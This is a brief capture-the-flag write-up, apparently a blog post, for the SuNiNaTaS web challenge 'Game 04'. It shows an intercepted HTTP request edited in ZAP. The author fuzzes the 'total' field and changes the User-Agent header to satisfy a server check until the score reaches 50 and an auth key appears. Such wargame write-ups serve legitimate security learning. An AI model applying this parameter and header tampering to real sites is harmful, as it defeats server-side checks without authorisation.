Suninatas Game 04

Posted on Edited on In Views: Disqus: Word count in article: 183 Reading time ≈ 1 mins.

challenges

Game 04

1
2
<!-- Hint : Make your point to 50 & 'SuNiNaTaS' -->
<!-- M@de by 2theT0P -->

i use zaproxy btw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ // remember this is your session
Upgrade-Insecure-Requests: 1
Priority: u=0, i

total=0 // set fuzz location, numberzz from 0->23

// then click plus in browser with the same cookie
get alert
I like the SuNiNaTaS browser!

// move to requester and change User-Agent

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0 // changed
...
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ

total=25

// notice the point plus
// use fuzz again, until point = 50, don't overflow

<td class="table_top"><font size="2"><b>Auth key</b></font></td>
<td class="table_top">***********************</td>
Change your Us3r Ag3ent